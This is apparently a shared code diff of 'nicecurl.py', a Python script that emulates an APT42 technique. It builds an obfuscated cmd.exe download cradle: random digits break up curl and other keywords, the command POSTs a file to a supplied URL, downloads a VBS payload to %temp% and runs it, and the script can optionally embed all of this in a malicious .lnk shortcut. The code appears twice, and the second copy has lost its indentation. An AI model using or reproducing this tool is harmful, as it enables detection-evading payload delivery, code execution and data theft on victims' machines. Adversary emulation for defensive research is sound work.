HackingLZ · May 2, 2024 13:43
diff --git a/nicecurl.py b/nicecurl.py
 # https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
 import argparse
 import random
 import win32com.client

 def insert_digit(word, digit):
    pos = random.randint(1, len(word) - 1)
    return word[:pos] + digit + word[pos:]

 def generate_command(url, file_path):
    digit = str(random.randint(0, 9))
    words = ["curl", "ssl", "revoke", "POST", "down.vbs", "start", "file.vbs"]
    words_with_digit = [insert_digit(word, digit) for word in words]
    base_command = f"""
 set c={words_with_digit[0]} --{words_with_digit[1]}-no-{words_with_digit[2]} -s -d "{file_path}" -X {words_with_digit[3]} {url}/file -o %temp%\\{words_with_digit[4]} & call %c:{{digit}}=% & set b={words_with_digit[5]} "" "%temp%\\{words_with_digit[6]}" & call %b:{{digit}}=%
 """.strip().format(digit=digit)
    return base_command

 def create_lnk(command, lnk_path):
    shell = win32com.client.Dispatch('WScript.Shell')
    shortcut = shell.CreateShortcut(lnk_path)
    shortcut.TargetPath = 'C:\\Windows\\System32\\cmd.exe'
    shortcut.Arguments = '/c ' + command
    shortcut.save()

 def main():
    parser = argparse.ArgumentParser(description="cmd download cradle based on nicecurl")
    parser.add_argument("url", type=str, help="URL")
    parser.add_argument("--file_path", type=str, default="id=file.txt", help="File path default is 'id=file.txt'.")
    parser.add_argument("--lnk", type=str, help="Optional: Path to create a shortcut LNK file.")
    args = parser.parse_args()

    base_command = generate_command(args.url, args.file_path)
    full_command = "cmd.exe /c " + base_command
    print("Generated Command:\n", full_command)

    if args.lnk:
        create_lnk(base_command, args.lnk)
        print(f"Shortcut .lnk file created at {args.lnk}")

 if __name__ == "__main__":
    main()
	# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
	import argparse
	import random
	import win32com.client

	def insert_digit(word, digit):
	pos = random.randint(1, len(word) - 1)
	return word[:pos] + digit + word[pos:]

	def generate_command(url, file_path):
	digit = str(random.randint(0, 9))
	words = ["curl", "ssl", "revoke", "POST", "down.vbs", "start", "file.vbs"]
	words_with_digit = [insert_digit(word, digit) for word in words]
	base_command = f"""
	set c={words_with_digit[0]} --{words_with_digit[1]}-no-{words_with_digit[2]} -s -d "{file_path}" -X {words_with_digit[3]} {url}/file -o %temp%\\{words_with_digit[4]} & call %c:{{digit}}=% & set b={words_with_digit[5]} "" "%temp%\\{words_with_digit[6]}" & call %b:{{digit}}=%
	""".strip().format(digit=digit)
	return base_command

	def create_lnk(command, lnk_path):
	shell = win32com.client.Dispatch('WScript.Shell')
	shortcut = shell.CreateShortcut(lnk_path)
	shortcut.TargetPath = 'C:\\Windows\\System32\\cmd.exe'
	shortcut.Arguments = '/c ' + command
	shortcut.save()

	def main():
	parser = argparse.ArgumentParser(description="cmd download cradle based on nicecurl")
	parser.add_argument("url", type=str, help="URL")
	parser.add_argument("--file_path", type=str, default="id=file.txt", help="File path default is 'id=file.txt'.")
	parser.add_argument("--lnk", type=str, help="Optional: Path to create a shortcut LNK file.")
	args = parser.parse_args()

	base_command = generate_command(args.url, args.file_path)
	full_command = "cmd.exe /c " + base_command
	print("Generated Command:\n", full_command)

	if args.lnk:
	create_lnk(base_command, args.lnk)
	print(f"Shortcut .lnk file created at {args.lnk}")

	if __name__ == "__main__":
	main()